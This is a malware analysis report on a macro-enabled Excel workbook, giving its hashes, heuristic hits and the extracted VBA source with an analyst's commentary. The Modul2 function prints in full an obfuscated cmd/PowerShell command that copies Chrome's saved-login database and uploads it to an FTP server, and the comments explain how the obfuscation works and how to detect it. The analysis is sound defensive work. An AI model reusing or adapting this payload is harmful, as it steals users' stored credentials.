Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 11f4f010597a62b4…

MALICIOUS

Office (OOXML)

19.9 KB Created: 2021-02-28 19:44:56 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-04-01
MD5: 279e1ea18e99d9cbee8ea918515415fe SHA-1: 68f9bdeca0303a452e2fdd1ef288b7158a81b72a SHA-256: 11f4f010597a62b4201bfcf3166e9a032c863370dc5202098f072ac170e4832a
Risk score: 140

Heuristics 3

  • VBA project inside OOXML — severity: medium — 2 related findings — rule: OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA — severity: critical — rule: OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        strOutput = Shell("cmd /V:ON/C""set XP0u=n&&set sOK=a&&set h4=""""""""$env:tmp\ch&&set iQKN=inati&&set nZl=:&&set qM=cmd.ex&&set oq=""""&&set F1=)&&set BnlF=AppD&&set ya5P=romeLoginData""""&&set 7ECK=ta\Google\Ch&&set FcD2=New-Ob&&set OB0G=a', """"&&set qYPO=at&&set b0Sc=Lo&&set rR0=ymous&&set r4= /C Powershell &&set 6n=e&&set JS=rome\User Data\De&&set FdBn=Loc&&set 29=fault\Login Data""""&&set QRS= System.Net.WebClient).UploadFile('ftp&&set vi=p\chrome&&set gG62=th """"&&set IA=opy-Item -Pa …
  • PowerShell reference in VBA — severity: critical — rule: OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        ActiveCell.FormulaR1C1 = "    strCommand = ""Powershell Echo Hello World"""

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3853 bytes
SHA-256: d11c05d1a5dc22932c2f6edaebf34aab53a85d6447a8833de7b5182bf30f742e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Modul1"
' Standard module "Modul1": holds only the procedure test1 below.
Sub test1()
Attribute test1.VB_ProcData.VB_Invoke_Func = " \n14"
'
' test1 Makro
'

'
' NOTE(review): looks like a macro-recorder capture ("Makro" is the German recorder
' header). It only scrolls the active window, pastes the clipboard into A1, writes two
' cell values and saves the workbook as an .xlsm on the author's desktop. It does not
' call RunAndGetCmd (Modul2) and does not start any process itself.
    ActiveWindow.SmallScroll Down:=12
    Range("A16").Select
    ActiveWindow.SmallScroll Down:=27
    ActiveWindow.ScrollRow = 42
    ActiveWindow.ScrollRow = 41
    ActiveWindow.ScrollRow = 40
    ActiveWindow.ScrollRow = 39
    ActiveWindow.ScrollRow = 38
    ActiveWindow.ScrollRow = 36
    ActiveWindow.ScrollRow = 34
    ActiveWindow.ScrollRow = 32
    ActiveWindow.ScrollRow = 30
    ActiveWindow.ScrollRow = 27
    ActiveWindow.ScrollRow = 25
    ActiveWindow.ScrollRow = 23
    ActiveWindow.ScrollRow = 21
    ActiveWindow.ScrollRow = 19
    ActiveWindow.ScrollRow = 16
    ActiveWindow.ScrollRow = 14
    ActiveWindow.ScrollRow = 13
    ActiveWindow.ScrollRow = 11
    ActiveWindow.ScrollRow = 8
    ActiveWindow.ScrollRow = 6
    ActiveWindow.ScrollRow = 5
    ActiveWindow.ScrollRow = 3
    ActiveWindow.ScrollRow = 2
    ActiveWindow.ScrollRow = 1
    ' Paste whatever is on the clipboard at A1 (content not visible from this listing).
    Range("A1").Select
    ActiveSheet.Paste
    ActiveWindow.SmallScroll Down:=6
    ActiveWindow.ScrollRow = 24
    ActiveWindow.ScrollRow = 23
    ActiveWindow.ScrollRow = 22
    ActiveWindow.ScrollRow = 21
    ActiveWindow.ScrollRow = 20
    ActiveWindow.ScrollRow = 19
    ActiveWindow.ScrollRow = 18
    ActiveWindow.ScrollRow = 17
    ActiveWindow.ScrollRow = 16
    ActiveWindow.ScrollRow = 15
    ActiveWindow.ScrollRow = 14
    ActiveWindow.ScrollRow = 12
    ActiveWindow.ScrollRow = 11
    ActiveWindow.ScrollRow = 10
    ActiveWindow.ScrollRow = 9
    ActiveWindow.ScrollRow = 8
    ActiveWindow.ScrollRow = 7
    ActiveWindow.ScrollRow = 6
    ActiveWindow.ScrollRow = 5
    ActiveWindow.ScrollRow = 4
    ActiveWindow.ScrollRow = 3
    ActiveWindow.ScrollRow = 2
    ActiveWindow.ScrollRow = 1
    ' A2 is cleared; A3 receives the literal text of a VBA line as CELL CONTENT.
    ' This is the line the OLE_VBA_PS heuristic matched: it is data written into the
    ' worksheet, not a code path that runs PowerShell. The executable payload is in
    ' RunAndGetCmd (Modul2).
    Range("A2").Select
    ActiveCell.FormulaR1C1 = ""
    Range("A3").Select
    ActiveCell.FormulaR1C1 = "    strCommand = ""Powershell Echo Hello World"""
    Range("A6").Select
    ' Authoring artifact: hard-coded profile path leaks the author's user name
    ' ("Kassandra") and the original file name (test1.xlsm); useful for pivoting on
    ' related samples. The workbook is saved macro-enabled.
    ChDir "C:\Users\Kassandra\Desktop"
    ActiveWorkbook.SaveAs Filename:="C:\Users\Kassandra\Desktop\test1.xlsm", _
        FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False
    Range("C7").Select
End Sub

Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Document module "DieseArbeitsmappe" (German-locale name for ThisWorkbook; the
' VB_Base GUID appears to be the Excel Workbook class ID). Empty in the extracted
' source: no Workbook_Open or other event handler is present, so this listing shows
' no automatic trigger for RunAndGetCmd — confirm against the full project.

Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Document module "Tabelle1" (German-locale name for Sheet1; VB_Base GUID appears to
' be the Excel Worksheet class ID). Also empty — no Worksheet event handlers.

Attribute VB_Name = "Modul2"
' Standard module "Modul2": holds RunAndGetCmd, the only process-spawning code in
' the extracted project.
Function RunAndGetCmd()
' Launches cmd.exe with delayed environment-variable expansion (/V:ON). The command
' line first stores ~35 short string fragments in randomly named environment
' variables, concatenates them in a fixed order with "call set 98R=...", and then
' executes the assembled string via "call %98R:...%", which at the same time rewrites
' the doubled quotes (the !oq:~1! substitution). This is string-splitting obfuscation
' aimed at defeating static keyword matching; the fragments visible here reassemble
' into a PowerShell one-liner that copies Chrome's "Login Data" credential database
' from %LocalAppData%\Google\Chrome\User Data\Default into %TMP% and uploads it with
' System.Net.WebClient.UploadFile to an anonymous FTP server at 192.168.56.102
' (an RFC 1918 address, consistent with a lab or proof-of-concept build).
'
' Despite the name, nothing is "got": VBA's Shell() returns the task ID, not the
' child's output, so strOutput (undeclared — no Option Explicit) holds a number and
' is never used, and the function never assigns its own return value.
' No auto-run hook (Workbook_Open, Auto_Open) appears in the extracted modules, so
' the trigger is not evident from this listing.
' Detection points: cmd.exe with "/V:ON" spawned by EXCEL.EXE, PowerShell reading a
' browser "Login Data" file, and outbound FTP originating from an Office process.

    strOutput = Shell("cmd /V:ON/C""set XP0u=n&&set sOK=a&&set h4=""""""""$env:tmp\ch&&set iQKN=inati&&set nZl=:&&set qM=cmd.ex&&set oq=""""&&set F1=)&&set BnlF=AppD&&set ya5P=romeLoginData""""&&set 7ECK=ta\Google\Ch&&set FcD2=New-Ob&&set OB0G=a', """"&&set qYPO=at&&set b0Sc=Lo&&set rR0=ymous&&set r4= /C Powershell &&set 6n=e&&set JS=rome\User Data\De&&set FdBn=Loc&&set 29=fault\Login Data""""&&set QRS= System.Net.WebClient).UploadFile('ftp&&set vi=p\chrome&&set gG62=th """"&&set IA=opy-Item -Pa&&set kt=://ano&&set 2bqk=""""""""$env:&&set rp=@192.168.56.102/data/logind&&set n2ef=ject&&set 49=C&&set qSk=ginData; (&&set Kwi=""""""""&&set 4y=al&&set Bo=on $env:tm&&set 6Ee="""""""" -Dest&&call set 98R=%qM%%6n%%r4%%49%%IA%%gG62%%2bqk%%FdBn%%4y%%BnlF%%sOK%%7ECK%%JS%%29%%6Ee%%iQKN%%Bo%%vi%%b0Sc%%qSk%%FcD2%%n2ef%%QRS%%kt%%XP0u%%rR0%%nZl%%rp%%qYPO%%OB0G%%h4%%ya5P%%Kwi%%F1%&&call %98R:""""=!oq:~1!%""")

End Function
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 36864 bytes
SHA-256: c36375af10769350b2bb4e428fa3fe42d8b8eda12c9f4e9abdda09a275578be9